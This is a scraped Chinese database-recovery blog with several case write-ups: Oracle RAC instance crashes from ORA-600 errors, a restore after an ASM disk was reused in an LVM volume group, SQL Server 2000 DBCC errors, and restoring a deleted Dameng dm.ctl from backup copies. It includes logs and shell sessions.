Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p002_69621.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311276+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311280+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311308+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p003_69623.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311329+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p004_69625.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311341+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p005_69627.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311345+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p007_69631.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311353+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p008_69633.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311374+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p006_69629.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311386+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p009_69635.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311402+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p00a_69637.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311513+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p00c_69641.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311515+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p00b_69639.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.348331+08:00
USER (ospid: 69617): terminating the instance due to error 10388
2025-05-06T10:37:52.585589+08:00
System state dump requested by (instance=2, osid=69617 (P000)), summary=[abnormal instance termination].
System State dumped to trace file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_diag_67490_20250506103752.trc
2025-05-06T10:37:54.016704+08:00
License high water mark = 34
2025-05-06T10:37:55.387072+08:00
Instance terminated by USER, pid = 69617
2025-05-06T10:37:55.388683+08:00
Warning: 2 processes are still attach to shmid 2850830:
 (size: 45056 bytes, creator pid: 65902, last attach/detach pid: 67492)
2025-05-06T10:37:56.018027+08:00
USER (ospid: 69907): terminating the instance
2025-05-06T10:37:56.021711+08:00
Instance terminated by USER, pid = 69907

查询mos发现类似文章:
Database doesn’t open after crash ORA-00600 [krccfl_chunk] (Doc ID 2967548.1)
Bug 33251482 – ORA-487 / ORA-600 [krccfl_chunk] : CTWR process terminated during PDB creation (Doc ID 33251482.8)
ORA-600-krccfl_chunk


分析这个客户情况,通过trace信息:Block change tracking file is current. 可以确认是启用了BCT,而且日志信息也反应出来是pdb环境。进一步分析客户的情况,发现他们在以前有一个数据文件创建到了本地(实际是rac环境)

2024-12-23T11:07:09.168322+08:00
PDBODS(5):Completed: alter tablespace PDBODS_DATA add datafile 'D:\APP\ADMINISTRATOR\ORADATA\ORCL\USERS02.DBF'
 size 5000M autoextend on next 1000M maxsize 32000M

数据库中现在实际存储路径/u01/app/oracle/product/12.2.0.1/dbhome_1/dbs/D:APPADMINISTRATORORADATAORCLUSERS 02.DBF
基于这种情况,解决问题比较简单:在本地数据文件所在节点禁用BCT,然后open库,把数据文件拷贝到asm中即可

Oracle Recovery Tools恢复案例总结—202505

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:Oracle Recovery Tools恢复案例总结—202505

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

开发出来Oracle Recovery Tools小工具已经一段时间,而且在大量的客户恢复case中使用,大大的提高的恢复效率,特别是win平台需要bbed或者类似工具的时候.现在对该工具在实战中的一些case进行总结:
Oracle Recovery Tools修复空闲坏块
Oracle Recovery Tools实战批量坏块修复
Oracle Recovery Tools快速恢复ORA-19909
Oracle Recovery Tools 解决ORA-600 3020故障
Oracle Recovery Tools恢复csc higher than block scn
Oracle Recovery Tools恢复MISSING00000文件故障
Oracle Recovery Tools快速恢复重建ctl遗漏数据文件故障
一键恢复ORA-01113 ORA-01110—Oracle Recovery Tools
Oracle Recovery Tools 解决ORA-01190 ORA-01248等故障
Oracle Recovery Tools快速解决sysaux文件不能online问题
Oracle Recovery Tools恢复—ORA-00704 ORA-01555故障
ORA-01113 ORA-01110错误不一定都要Oracle Recovery Tools解决
Oracle Recovery Tools解决ORA-00279 ORA-00289 ORA-00280故障
Oracle Recovery Tools修复ORA-600 6101/kdxlin:psno out of range故障
Oracle Recovery Tools工具一键解决ORA-00376 ORA-01110故障(文件offline)
Oracle Recovery Tools修复ORA-00742、ORA-600 ktbair2: illegal inheritance故障
Oracle Recovery Tools快速恢复断电引起的无法正常启动数据库(ORA-01555,MISSING000等问题)
软件下载:OraRecovery下载
使用说明:使用说明

ORA-600 kddummy_blkchk 数据库循环重启

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:ORA-600 kddummy_blkchk 数据库循环重启

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

一个运行在hp平台的10g rac突然异常,之后运行一段时间就自动重启,客户让对其进行分析和解决

Thu May  8 06:23:21 2025
ALTER DATABASE OPEN
Picked broadcast on commit scheme to generate SCNs
Thu May  8 06:23:21 2025
Thread 1 opened at log sequence 74302
  Current log# 1 seq# 74302 mem# 0: /dev/vgdata/rrac_redo01
Successful open of redo thread 1
Thu May  8 06:23:21 2025
MTTR advisory is disabled because FAST_START_MTTR_TARGET is not set
Thu May  8 06:23:21 2025
SMON: enabling cache recovery
Thu May  8 06:23:22 2025
Successfully onlined Undo Tablespace 1.
Thu May  8 06:23:22 2025
SMON: enabling tx recovery
Thu May  8 06:23:22 2025
Database Characterset is ZHS16CGB231280
Opening with internal Resource Manager plan
where NUMA PG = 1, CPUs = 4
replication_dependency_tracking turned off (no async multimaster replication found)
Thu May  8 06:23:23 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Starting background process QMNC
QMNC started with pid=22, OS id=15792
Thu May  8 06:23:25 2025
ORACLE Instance orcl1 (pid = 13) - Error 607 encountered while recovering transaction (9, 33) on object 775794.
Thu May  8 06:23:25 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Thu May  8 06:23:26 2025
Completed: ALTER DATABASE OPEN
Thu May  8 06:23:26 2025
Doing block recovery for file 118 block 333578
Block recovery from logseq 74302, block 22 to scn 46740761996
Thu May  8 06:23:26 2025
Recovery of Online Redo Log: Thread 1 Group 1 Seq 74302 Reading mem 0
  Mem# 0: /dev/vgdata/rrac_redo01
Block recovery stopped at EOT rba 74302.33.16
Block recovery completed at rba 74302.33.16, scn 10.3791089036
Thu May  8 06:23:33 2025
Trace dumping is performing id=[cdmp_20250508062324]
Thu May  8 06:25:55 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Thu May  8 06:25:58 2025
ORACLE Instance orcl1 (pid = 13) - Error 607 encountered while recovering transaction (9, 33) on object 775794.
Thu May  8 06:27:32 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
Doing block recovery for file 118 block 333578
Block recovery from logseq 74302, block 372 to scn 46740952565
Thu May  8 06:27:41 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
ORACLE Instance orcl1 (pid = 13) - Error 607 encountered while recovering transaction (9, 33) on object 775794.
Thu May  8 06:27:43 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Doing block recovery for file 118 block 333578
Block recovery from logseq 74302, block 372 to scn 46740952565
Thu May  8 06:27:45 2025
Recovery of Online Redo Log: Thread 1 Group 1 Seq 74302 Reading mem 0
  Mem# 0: /dev/vgdata/rrac_redo01
Block recovery completed at rba 74302.394.16, scn 10.3791279606
Thu May  8 06:27:47 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_smon_15721.trc:
ORA-00600: internal error code, arguments: [kddummy_blkchk], [118], [333578], [18019], [], [], [], []
Thu May  8 06:28:07 2025
Errors in file /users/oracle/admin/orcl/bdump/orcl1_pmon_15690.trc:
ORA-00474: SMON process terminated with error
Thu May  8 06:28:07 2025
PMON: terminating instance due to error 474

这个数据库重启是由于smon进程异常导致数据库关闭,然后rac自动拉起数据库,从而出现了循环重启启动,smon异常的主要原因是由于“ORACLE Instance orcl1 (pid = 13) – Error 607 encountered while recovering transaction (9, 33) on object 775794.”这个表示有实物要回滚,但是遇到了ORA-600 kddummy_blkchk异常,无法完成回滚从而使得smon进程异常进而使得数据实例crash.对于这个问题处理相对比较简单
1. 通过ORA-600 kddummy_blkchk找出来报错对象

ORA-00600: internal error code, arguments: [kddummy_blkchk], [a], [b], 1

ARGUMENTS:
Arg [a] Absolute file number
Arg [b] Block number
Arg 1 Internal error code returned from kcbchk() which indicates the problem encountered.

2. 屏蔽实物回滚,打开数据库,然后对通过dba_extents 查询出来的对象/或者根据事务报错的object信息查询出来对象进行重建,完成本次恢复任务

关于ORA-00600: internal error code, arguments: [kddummy_blkchk], [a], [b], 相关目前已知bug

Bug Fixed Description
12349316 11.2.0.4, 12.1.0.2, 12.2.0.1 DBMS_SPACE_ADMIN.TABLESPACE_FIX_BITMAPS fails with ORA-600 [kddummy_blkchk] / ORA-600 [kdBlkCheckError] / ORA-607
17325413 11.2.0.3.BP23, 11.2.0.4.2, 11.2.0.4.BP04, 12.1.0.1.3, 12.1.0.2, 12.2.0.1 Drop column with DEFAULT value and NOT NULL definition ends up with Dropped Column Data still on Disk leading to Corruption
13715932 11.2.0.4, 12.1.0.1 ORA-600 [kddummy_blkchk] [18038] while adding extents to a large datafile
12417369 11.2.0.2.5, 11.2.0.2.BP13, 11.2.0.2.GIPSU05, 11.2.0.3, 12.1.0.1 Block corruption from rollback on compressed table
10324526 10.2.0.5.4, 11.1.0.7.8, 11.2.0.2.3, 11.2.0.2.BP06, 11.2.0.3, 12.1.0.1 ORA-600 [kddummy_blkchk] [6106] / corruption on COMPRESS table in TTS
10113224 11.2.0.3, 12.1.0.1 Index coalesce may generate invalid redo if blocks in the buffer cache are invalid/corrupted
9726702 11.2.0.3, 12.1.0.1 DBMS_SPACE_ADMIN.assm_segment_verify reports HWM related inconsistencies
9724970 11.2.0.1.BP08, 11.2.0.2.2, 11.2.0.2.BP02, 11.2.0.3, 12.1.0.1 Block Corruption with PDML UPDATE. ORA_600 [4511] OERI[kdblkcheckerror] by block check
9711859 10.2.0.5.1, 11.1.0.7.6, 11.2.0.2, 12.1.0.1 ORA-600 [ktsptrn_fix-extmap] / ORA-600 [kdblkcheckerror] during extent allocation caused by bug 8198906
9581240 11.1.0.7.9, 11.2.0.2, 12.1.0.1 Corruption / ORA-600 [kddummy_blkchk] [6101] / ORA-600 [7999] after RENAME operation during ROLLBACK
9350204 11.2.0.3, 12.1.0.1 Spurious ORA-600 [kddummy_blkchk] .. [6145] during CR operations on tables with ROWDEPENDENCIES
9231605 11.1.0.7.4, 11.2.0.1.3, 11.2.0.1.BP02, 11.2.0.2, 12.1.0.1 Block corruption with missing row on a compressed table after DELETE
9119771 11.2.0.2, 12.1.0.1 OERI [kddummy_blkchk]…[6108] from ‘SHRINK SPACE CASCADE’
9019113 11.2.0.1.BP02, 11.2.0.2, 12.1.0.1 ORA-600 [17182] ORA-7445 [memcpy] ORA-600 [kdBlkCheckError] for OLTP COMPRESS table in OLTP Compression REDO during RECOVERY
8951812 11.2.0.2, 12.1.0.1 Corrupt index by rebuild online. Possible OERI [kddummy_blkchk] by SMON
8720802 10.2.0.5, 11.2.0.1.BP07, 11.2.0.2, 12.1.0.1 Add check for row piece pointing to itself (db_block_checking,dbv,rman,analyze)
8331063 11.2.0.3, 12.1.0.1 Corrupt Undo. ORA-600 [2015] in Undo Block During Rollback
6523037 11.2.0.1.BP07, 11.2.0.2.2, 11.2.0.2.BP01, 11.2.0.3, 12.1.0.1 Corruption / ORA-600 [kddummy_blkchk] [6110] on update
8277580 11.1.0.7.2, 11.2.0.1, 11.2.0.2, 12.1.0.1 Corruption on compressed tables during Recovery and Quick Multi Delete (QMD).
9964102 11.2.0.1 OERI:2015 / OERI:kddummy_blkchk / undo corruption from supplementat logging with compressed tables
8613137 11.1.0.7.2, 11.2.0.1 ORA-600 updating table with DEFERRED constraints
8360192 11.1.0.7.6, 11.2.0.1 ORA-600 [kdBlkCheckError] [6110] / corruption from insert
8239658 10.2.0.5, 11.2.0.1 Dump / corruption writing row to compressed table
8198906 10.2.0.5, 11.2.0.1 OERI [kddummy_blkchk] / OERI [5467] for an aborted transaction of allocating extents
7715244 11.1.0.7.2, 11.2.0.1 Corruption on compressed tables. Error codes 6103 / 6110
7662491 10.2.0.4.2, 10.2.0.5, 11.1.0.7.4, 11.2.0.1 Array Update can corrupt a row. Errors OERI[kghstack_free1] or OERI[kddummy_blkchk][6110]
7411865 10.2.0.4.2, 10.2.0.5, 11.1.0.7.1, 11.2.0.1 OERI:13030 / ORA-1407 / block corruption from UPDATE .. RETURNING DML with trigger
7331181 11.2.0.1 ORA-1555 or OERI [kddummy_blkchk] [file#] [block#] [6126] during CR Rollback in query
7293156 11.1.0.7, 11.2.0.1 ORA-600 [2023] by Parallel Transaction Rollback when applying Multi-block undo Head-piece / Tail-piece
7041254 11.1.0.7.5, 11.2.0.1 ORA-19661 during RMAN restore check logical of compressed backup / IOT dummy key
6760697 10.2.0.4.3, 10.2.0.5, 11.1.0.7, 11.2.0.1 DBMS_SPACE_ADMIN.ASSM_SEGMENT_VERIFY does not detect certain segment header block corruption
6647480 10.2.0.4.4, 10.2.0.5, 11.1.0.7.3, 11.2.0.1 Corruption / OERI [kddummy_blkchk] .. [18021] with ASSM
6134368 10.2.0.5, 11.2.0.1 ORA-1407 / block corruption from UPDATE .. RETURNING DML with trigger – SUPERCEDED
6057203 10.2.0.4, 11.1.0.7, 11.2.0.1 Corruption with zero length column (ZLC) / OERI [kcbchg1_6] from Parallel update
6653934 10.2.0.4.2, 10.2.0.5, 11.1.0.7 Dump / block corruption from ONLINE segment shrink with ROWDEPENDENCIES
6674196 10.2.0.4, 10.2.0.5, 11.1.0.6 OERI / buffer cache corruption using ASM, OCFS or any ksfd client like ODM
5599596 10.2.0.4, 11.1.0.6 Block corruption / OERI [kddummy_blkchk] on clustered or compressed tables
5496041 10.2.0.4, 11.1.0.6 OERI[6006] / index corruption on compressed index
5386204 10.2.0.4.1, 10.2.0.5, 11.1.0.6 Block corruption / OERI[kddummy_blkchk] after direct load of ASSM segment
5363584 10.2.0.4, 11.1.0.6 Array insert into table can corrupt redo
4602031 10.2.0.2, 11.1.0.6 Block corruption from UPDATE or MERGE into compressed table
4493447 11.1.0.6 Spurious ORA-600 [kddummy_blkchk] [file#] [block#] [6145] on rollback of array update
4329302 11.1.0.6 OERI [kddummy_blkchk] [file#] [block#] [6145] on rollback of update with logminer
6075487 10.2.0.4 OERI[kddummy_blkchk]..[18020/18026] for DDL on plugged ASSM tablespace with FLASHBACK
4054640 10.1.0.5, 10.2.0.1 Block corruption / OERI [kddummy_blkchk] at physical standby
4000840 10.1.0.4, 10.2.0.1, 9.2.0.7 Update of a row with more than 255 columns can cause block corruption
3772033 9.2.0.7, 10.1.0.4, 10.2.0.1 OERI[ktspfmb_create1] creating a LOB in ASSM using 2k blocksize

 

记录一次asm disk加入到vg通过恢复直接open库的案例

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:记录一次asm disk加入到vg通过恢复直接open库的案例

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

客户在不清楚磁盘被asm disk使用的情况下,直接分区做pv,加入到vg中并且分配给了lv,导致数据库异常
QQ20250504
144809


通过操作系统层面分析,确认客户把data磁盘组的一个磁盘给处理掉了,导致数据库报错

WARNING: ASMB force dismounting group 2 (DATA) due to failover
SUCCESS: diskgroup DATA was dismounted
2025-05-04T07:03:19.910082+08:00
KCF: read, write or open error, block=0x201544 online=1
        file=102 '+DATA/ORCL/F7D939D6DBE06C71E053C30114AC1F10/DATAFILE/xifenfei_61.dbf'
        error=15078 txt: ''
2025-05-04T07:03:19.918972+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_dbwc_18507.trc:
2025-05-04T07:03:19.952045+08:00
KCF: read, write or open error, block=0x2013e7 online=1
        file=102 '+DATA/ORCL/F7D939D6DBE06C71E053C30114AC1F10/DATAFILE/xifenfei_61.dbf'
        error=15078 txt: ''
2025-05-04T07:03:19.964538+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_dbw7_18486.trc:
2025-05-04T07:03:19.967133+08:00
KCF: read, write or open error, block=0x230e71 online=1
        file=105 '+DATA/ORCL/F7D939D6DBE06C71E053C30114AC1F10/DATAFILE/xifenfei_64.dbf'
        error=15078 txt: ''
2025-05-04T07:03:19.973289+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_dbw2_18466.trc:
2025-05-04T07:03:19.978514+08:00
KCF: read, write or open error, block=0x1f6e91 online=1
        file=86 '+DATA/ORCL/F7D939D6DBE06C71E053C30114AC1F10/DATAFILE/xifenfei_52.dbf'
        error=15078 txt: ''
2025-05-04T07:03:19.991060+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_dbwd_18511.trc:
2025-05-04T07:03:19.995762+08:00
KCF: read, write or open error, block=0x7f8 online=1
        file=15 '+DATA/ORCL/F7D939D6DBE06C71E053C30114AC1F10/DATAFILE/undotbs01.dbf'
        error=15078 txt: ''
2025-05-04T07:03:20.006862+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_dbwa_18498.trc:
2025-05-04T07:03:20.020739+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_imr0_18937.trc:

这个客户比较幸运,处理该磁盘之后,没有往对应的lv中写入太多数据,导致覆盖部分很少

[root@rac01 rules.d]# df -h
文件系统               容量  已用  可用 已用% 挂载点
/dev/mapper/nlas-root  800G  272G  528G   34% /
devtmpfs               284G     0  284G    0% /dev
tmpfs                  284G  637M  283G    1% /dev/shm
tmpfs                  284G  4.0G  280G    2% /run
tmpfs                  284G     0  284G    0% /sys/fs/cgroup
/dev/mapper/nlas-home  200G   64M  200G    1% /home
/dev/sda1              197M  158M   40M   80% /boot
tmpfs                   57G   40K   57G    1% /run/user/0
tmpfs                   57G   48K   57G    1% /run/user/1000
[root@rac01 rules.d]# pvs
  PV         VG   Fmt  Attr PSize   PFree
  /dev/sda2  nlas lvm2 a--  564.00g    0 
  /dev/sdb1  nlas lvm2 a--   <2.00t 1.51t
[root@rac01 rules.d]# vgs
  VG   #PV #LV #SN Attr   VSize VFree
  nlas   2   3   0 wz--n- 2.55t 1.51t
[root@rac01 rules.d]# lvs
  LV   VG   Attr       LSize   Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
  home nlas -wi-ao---- 200.00g                                                    
  root nlas -wi-ao---- 800.00g                                                    
  swap nlas -wi-ao----  64.00g                                                    

通过底层对磁盘进行分析,发现备份的磁盘头均以损坏,通过深入分析确认f1b1在sdb磁盘的第10个au上,通过相关信息,使用dul工具加载磁盘组,并分析元数据信息,发现恢复数据需要的元数据都可以正常加载
asm-dul


直接使用dul抽取数据到文件系统,然后open数据库成功
open-asm

然后通过rman 检测坏块(3T多的库只有不到5000个坏块,相对来说效果非常好),对于坏块对象进行处理,完美完成本次恢复工作.对于这次能够有这样好的恢复效果有几个因素:
1)asm disk 加入到vg,并分配给lv之后,立刻停止写入操作,避免了因为写入数据而覆盖asm 磁盘的带来的风险
2)由于是19c库,默认au为4M,使得数据库文件数据相对比较靠后,覆盖几率小了一点
3)由于文件系统是xfs,相对覆盖比ext4会少很多
4)是云环境的ssd磁盘,没有触发trim功能
以前类似asm disk异常恢复的相关case汇总:
asm磁盘加入vg恢复
asm磁盘dd破坏恢复
asm磁盘分区丢失恢复
pvid=yes导致asm无法mount
win asm disk header 异常恢复
又一例asm disk 加入vg故障
pvcreate asm disk导致asm磁盘组异常恢复
asm disk被加入到另外一个磁盘组故障恢复
再一例asm disk被误加入vg并且扩容lv恢复
再一起asm disk被格式化成ext3文件系统故障恢复
一次完美的asm disk被格式化ntfs恢复
asm disk误设置pvid导致asm diskgroup无法mount恢复
asm disk被分区,格式化为ext4恢复
oracle asm disk格式化恢复—格式化为ext4文件系统
分享oracleasm createdisk重新创建asm disk后数据0丢失恢复案例

CHECKDB 发现了 N 个分配错误和 M 个一致性错误

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:CHECKDB 发现了 N 个分配错误和 M 个一致性错误

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

接到一个朋友的数据库故障请求,dbcc checkdb报以下错误

服务器: 消息 8905,级别 16,状态 1,行 1
扩展盘区 (1:5144)(属于数据库 ID 8)在 GAM 中标记为已分配,但没有 SGAM 或 IAM 分配过该盘区。
服务器: 消息 8929,级别 16,状态 1,行 1
对象 ID 2: 在文本 ID 800849920 中发现错误,该文本的所有者是由 RID = (1:143:7) id = 1218103380 and indid = 4 标识的数据记录。
服务器: 消息 8961,级别 16,状态 1,行 1
表错误: 对象 ID 2。text、ntext 或 image 节点(位于页 (1:3813),槽 0,文本 ID 800849920)与该节点位于页 (1:489),槽 4 处的引用不匹配。
'myhis' 的 DBCC 结果。
CHECKDB 发现了 1 个分配错误和 0 个一致性错误,这些错误并不与任何单个的对象相关联。
'sysobjects' 的 DBCC 结果。
对象 'sysobjects' 有 905 行,这些行位于 13 页中。
'sysindexes' 的 DBCC 结果。
对象 'sysindexes' 有 635 行,这些行位于 26 页中。
CHECKDB 发现了 0 个分配错误和 2 个一致性错误(在表 'sysindexes' 中,该表的对象 ID 为 2)。
'syscolumns' 的 DBCC 结果。
………………
对象 'yj_sqd_taoc' 有 0 行,这些行位于 0 页中。
'h_zdytj' 的 DBCC 结果。
对象 'h_zdytj' 有 0 行,这些行位于 0 页中。
CHECKDB 发现了 1 个分配错误和 4 个一致性错误(在数据库 'myhis' 中)。
DBCC 执行完毕。如果 DBCC 输出了错误信息,请与系统管理员联系。

主要为:
1. 扩展盘区 (1:5144)(属于数据库 ID 8)在 GAM 中标记为已分配,但没有 SGAM 或 IAM 分配过该盘区。
2. 表错误: 对象 ID 2。text、ntext 或 image 节点(位于页 (1:3813),槽 0,文本 ID 800849920)与该节点位于页 (1:489),槽 4 处的引用不匹配。
3. CHECKDB 发现了 0 个分配错误和 2 个一致性错误(在表 ‘sysindexes’ 中,该表的对象 ID 为 2)

这个库是sql server 2000的版本,处理起来相对麻烦一些(由于该版本太老,很多工具软件对sql 2000版本支持不太好),后面通过sql恢复工具和sql控制台中的所有任务–>数据导入功能,对于个表异常表进行单独迁移完成本次任务
QQ20250503-194327


再次使用dbcc进行检测,一切正常,客户业务也恢复正常
QQ20250503-194523

达梦数据库dm.ctl文件异常恢复

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:达梦数据库dm.ctl文件异常恢复

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

达梦数据库中也有类似oracle的控制文件(control0x.ctl),在达梦数据库中一般叫做dm.ctl,具体是有dm.ini(达梦默认参数文件名)中的CTL_PATH参数确定.在某些情况下,由于参数文件损坏或者丢失,导致数据库异常,这里dm.ctl文件丢失故障恢复
创建表空间和表并插入数据

SQL> create tablespace tbs_xff datafile 'tbs_xff01.dbf' size 128;
操作已执行
已用时间: 52.996(毫秒). 执行号:1303.

SQL> create table t_xff tablespace tbs_xff as 
2   select * from dba_objects;
操作已执行
已用时间: 71.055(毫秒). 执行号:1304.
SQL> insert into t_xff select * from dba_objects;
影响行数 1094

已用时间: 28.759(毫秒). 执行号:1305.
SQL> insert into t_xff select * from dba_objects;
影响行数 1094

已用时间: 13.395(毫秒). 执行号:1306.
SQL> insert into t_xff select * from dba_objects;
影响行数 1094

已用时间: 13.867(毫秒). 执行号:1307.
SQL> insert into t_xff select * from dba_objects;
影响行数 1094

已用时间: 13.838(毫秒). 执行号:1308.
SQL> insert into t_xff select * from t_xff;
影响行数 5470

已用时间: 5.677(毫秒). 执行号:1309.
SQL> select count(1) from t_xff;

行号     COUNT(1)            
---------- --------------------
1          10940

已用时间: 1.949(毫秒). 执行号:1310.
SQL> insert into t_xff select * from t_xff;
影响行数 10940

已用时间: 35.035(毫秒). 执行号:1311.
SQL> insert into t_xff select * from t_xff;
影响行数 21880

已用时间: 38.489(毫秒). 执行号:1312.
SQL> insert into t_xff select * from t_xff;
影响行数 43760

已用时间: 86.242(毫秒). 执行号:1313.
SQL> insert into t_xff select * from t_xff;
影响行数 87520

已用时间: 272.804(毫秒). 执行号:1314.
SQL> insert into t_xff select * from t_xff;
影响行数 175040

已用时间: 529.733(毫秒). 执行号:1315.
SQL> insert into t_xff select * from t_xff;
影响行数 350080

已用时间: 00:00:01.090. 执行号:1316.
SQL> select count(1) from t_xff;

行号     COUNT(1)            
---------- --------------------
1          700160

已用时间: 0.352(毫秒). 执行号:1317.

kill达梦进程并删除dm.ctl文件

[dmdba@localhost ctl_bak]$ ps -ef|grep dmserver
dmdba     2216  1963  1 21:25 pts/1    00:00:10 dmserver /home/dmdba/dmdbms/data/htdb/dm.ini
dmdba     2401  1963  0 21:40 pts/1    00:00:00 grep --color=auto dmserver
[dmdba@localhost ctl_bak]$ kill -9 2216
[dmdba@localhost ctl_bak]$ 
[1]+  已杀死               nohup dmserver /home/dmdba/dmdbms/data/htdb/dm.ini(工作目录:~/dmdbms/log)
(当前工作目录:~/dmdbms/data/htdb/ctl_bak)
[dmdba@localhost htdb]$ 
[dmdba@localhost htdb]$ rm -rf dm.ctl 
[dmdba@localhost htdb]$ 

启动达梦数据库报错

[dmdba@localhost htdb]$ dmserver /home/dmdba/dmdbms/data/htdb/dm.ini
file dm.key not found, use default license!
Read ini error, name:CTL_PATH, value:/home/dmdba/dmdbms/data/htdb/dm.ctl
dmserver startup failed, code = -803 [Invalid ini config value]
nsvr_ini_file_read failed, 1
[dmdba@localhost htdb]$ 

使用备份ctl文件直接启动库
备份文件在dm.ini中的CTL_BAK_PATH参数控制备份控制文件路径(一般在达梦数据库目录的ctl_bak中),CTL_BAK_NUM控制备份文件数量

[dmdba@localhost htdb]$ cd ctl_bak/
[dmdba@localhost ctl_bak]$ ls -lhtra
总用量 96K
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  26 21:25 dm_20250426212532_981690.ctl
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  26 21:36 dm_20250426213636_596321.ctl
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  26 21:36 dm_20250426213636_599137.ctl
-rw-r--r--. 1 dmdba dmsys 6.0K 4月  26 21:36 dm_20250426213636_604672.ctl
-rw-r--r--. 1 dmdba dmsys 6.0K 4月  26 21:36 dm_20250426213636_607133.ctl
-rw-r--r--. 1 dmdba dmsys 6.0K 4月  26 21:36 dm_20250426213636_610925.ctl
drwxr-xr-x. 2 dmdba dmsys 4.0K 4月  26 21:36 .
-rw-r--r--. 1 dmdba dmsys 6.0K 4月  26 21:36 dm_20250426213636_630282.ctl
drwxr-xr-x. 6 dmdba dmsys 4.0K 4月  26 21:41 ..
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  27 2025 dm_20250427034852_563000.ctl
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  27 2025 dm_20250427034905_993889.ctl
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  27 2025 dm_20250427035646_961400.ctl
-rw-r--r--. 1 dmdba dmsys 5.5K 4月  27 2025 dm_20250427041036_574397.ctl
[dmdba@localhost ctl_bak]$ 
[dmdba@localhost ctl_bak]$ cp dm_20250427041036_574397.ctl ../dm.ctl
[dmdba@localhost ctl_bak]$ dmserver /home/dmdba/dmdbms/data/htdb/dm.ini
file dm.key not found, use default license!
version info: develop
csek2_vm_t = 1440
nsql_vm_t = 328
prjt2_vm_t = 176
ltid_vm_t = 216
nins2_vm_t = 1120
nset2_vm_t = 272
ndlck_vm_t = 192
ndel2_vm_t = 768
slct2_vm_t = 352
nli2_vm_t = 200
aagr2_vm_t = 304
pscn_vm_t = 376
dist_vm_t = 960
DM Database Server 64 V8 03134284336-20250117-257733-20132 startup...
Normal of FAST
